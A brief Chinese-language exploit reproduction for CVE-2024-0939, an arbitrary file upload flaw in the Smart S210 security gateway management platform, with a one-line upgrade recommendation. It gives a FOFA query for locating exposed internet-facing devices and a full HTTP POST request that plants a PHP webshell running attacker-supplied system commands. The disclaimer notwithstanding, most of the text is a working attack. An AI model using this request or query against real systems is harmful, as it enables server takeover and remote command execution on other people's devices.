CVE-2024-0939

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

漏洞名称

北京百绰智能S210管理平台uploadfile.php无限制上传漏洞

漏洞影响

Smart S210

漏洞描述

北京百卓网络技术有限公司有限公司(以下简称百卓网络)是一家致力于构建下一代安全互联网的高科技企业。百卓网络智能S210多业务安全网关智能管理平台存在任意文件上传漏洞。攻击者可以利用此漏洞获得服务器权限并操纵服务器文件。

FOFA搜索语句

title="Smart管理平台"

注意：搜到的资产可能无法用浏览器打开，这里有个诀窍：

1. 打开虚拟机，centos或者kali都可以

2. 在虚拟机中打开浏览器

3. 在虚拟机的浏览器中打开url

4. 点击高级->继续

漏洞复现

构造EXP并上传src.php文件

POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

访问/home/src.php获取webshell。

漏洞复现完成

修复建议

升级到最新版本。